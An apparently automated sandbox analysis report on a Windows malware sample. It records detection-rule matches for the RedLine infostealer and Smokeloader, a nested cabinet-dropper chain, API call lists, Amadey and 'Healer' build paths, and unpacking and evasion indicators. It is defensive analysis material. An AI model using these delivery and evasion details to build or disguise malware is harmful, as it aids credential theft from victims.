Source: 6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.3.will6283.exe.4deee20.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00381F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_00381F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01061F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_01061F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_00AC1F90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	3_2_002F1F90

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00383BA2	0_2_00383BA2
Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00385C9E	0_2_00385C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01063BA2	1_2_01063BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01065C9E	1_2_01065C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC3BA2	2_2_00AC3BA2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC5C9E	2_2_00AC5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F3BA2	3_2_002F3BA2
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F5C9E	3_2_002F5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00408C60	6_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_0040DC11	6_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00407C3F	6_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00418CCC	6_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00406CA0	6_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_004028B0	6_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_0041A4BE	6_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00418244	6_2_00418244
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00401650	6_2_00401650
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00402F20	6_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_004193C4	6_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00418788	6_2_00418788
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00402F89	6_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00402B90	6_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_004073A0	6_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_02DC0DB0	6_2_02DC0DB0

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Code function: String function: 0040E1D8 appears 44 times

Source: plEnknXWQD.exe	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 907046 bytes, 2 files, at 0x2c +A "will6283.exe" +A "ry40VI69.exe", ID 1992, number 1, 34 datablocks, 0x1503 compression
Source: will6283.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 716290 bytes, 2 files, at 0x2c +A "will3629.exe" +A "qs5212ER.exe", ID 1969, number 1, 28 datablocks, 0x1503 compression
Source: will3629.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 567826 bytes, 2 files, at 0x2c +A "will3971.exe" +A "py81WM70.exe", ID 1993, number 1, 24 datablocks, 0x1503 compression
Source: will3971.exe.2.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 205746 bytes, 2 files, at 0x2c +A "mx8896IL.exe" +A "ns5251Ks.exe", ID 1957, number 1, 11 datablocks, 0x1503 compression

Source: plEnknXWQD.exe, 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs plEnknXWQD.exe
Source: plEnknXWQD.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs plEnknXWQD.exe

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe 42873B0C5899F64B5F3205A4F3146210CC63152E529C69D6292B037844C81EC4

Source: py81WM70.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ns5251Ks.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: plEnknXWQD.exe	ReversingLabs: Detection: 66%
Source: plEnknXWQD.exe	Virustotal: Detection: 52%

Source: plEnknXWQD.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\plEnknXWQD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\plEnknXWQD.exe C:\Users\user\Desktop\plEnknXWQD.exe
Source: C:\Users\user\Desktop\plEnknXWQD.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Source: C:\Users\user\Desktop\plEnknXWQD.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Jump to behavior

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00381F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_00381F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01061F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_01061F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_00AC1F90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	3_2_002F1F90

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mx8896IL.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\plEnknXWQD.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/10@0/0

Source: C:\Users\user\Desktop\plEnknXWQD.exe

Code function: 0_2_0038597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_0038597D

Source: C:\Users\user\Desktop\plEnknXWQD.exe

0_2_0038597D

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe

Code function: 4_2_00007FF9A56C1B10 ChangeServiceConfigA,

4_2_00007FF9A56C1B10

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

6_2_004019F0

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Users\user\Desktop\plEnknXWQD.exe

Code function: 0_2_00384FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

0_2_00384FE0

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Command line argument: Kernel32.dll	0_2_00382BFB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Command line argument: Kernel32.dll	1_2_01062BFB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Command line argument: Kernel32.dll	2_2_00AC2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Command line argument: Kernel32.dll	3_2_002F2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Command line argument: 08A	6_2_00413780

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: plEnknXWQD.exe

Static file information: File size 1063936 > 1048576

Source: plEnknXWQD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: plEnknXWQD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: plEnknXWQD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: plEnknXWQD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: plEnknXWQD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: plEnknXWQD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: plEnknXWQD.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: plEnknXWQD.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: plEnknXWQD.exe, will3971.exe.2.dr, will6283.exe.0.dr, will3629.exe.1.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: plEnknXWQD.exe, 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp, ry40VI69.exe.0.dr
Source:	Binary string: Healer.pdb source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.371166445.0000000007090000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: plEnknXWQD.exe, will3971.exe.2.dr, will6283.exe.0.dr, will3629.exe.1.dr
Source:	Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: will3629.exe, 00000002.00000003.308857846.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, py81WM70.exe.2.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: will3971.exe, 00000003.00000003.309941661.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, mx8896IL.exe, 00000004.00000000.310427980.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, mx8896IL.exe.3.dr
Source:	Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: will3971.exe, 00000003.00000003.309941661.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000000.335153117.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, ns5251Ks.exe.3.dr
Source:	Binary string: _.pdb source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000003.346539295.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369340692.0000000002E81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\zarepot\talotoyuy1\guf.pdb source: will3629.exe, 00000002.00000003.308857846.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, py81WM70.exe.2.dr
Source:	Binary string: Healer.pdbH5 source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.371166445.0000000007090000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Unpacked PE file: 6.2.ns5251Ks.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Unpacked PE file: 6.2.ns5251Ks.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_0038724D push ecx; ret	0_2_00387260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_0106724D push ecx; ret	1_2_01067260
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC724D push ecx; ret	2_2_00AC7260
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F724D push ecx; ret	3_2_002F7260
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_0041C40C push cs; iretd	6_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00423149 push eax; ret	6_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_0041C50E push cs; iretd	6_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_004231C8 push eax; ret	6_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_0040E21D push ecx; ret	6_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_0041C6BE push ebx; ret	6_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_02DC454E push ecx; retf	6_2_02DC4554
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_02DC4139 push edi; iretd	6_2_02DC414E
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_02E1BAA3 push edi; retf	6_2_02E1BAA4
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_02E18B58 push FFFFFFE1h; ret	6_2_02E18B67

Source: C:\Users\user\Desktop\plEnknXWQD.exe

Code function: 0_2_0038202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,

0_2_0038202A

Source: qs5212ER.exe.1.dr

Static PE information: 0xCBA9AC16 [Mon Apr 11 09:21:26 2078 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.842085736950787
Source: initial sample	Static PE information: section name: .text entropy: 7.7554731967823

Source: C:\Users\user\Desktop\plEnknXWQD.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Jump to dropped file
Source: C:\Users\user\Desktop\plEnknXWQD.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe	Jump to dropped file

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00381AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	0_2_00381AE8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01061AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	1_2_01061AE8
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	2_2_00AC1AE8
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	3_2_002F1AE8

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
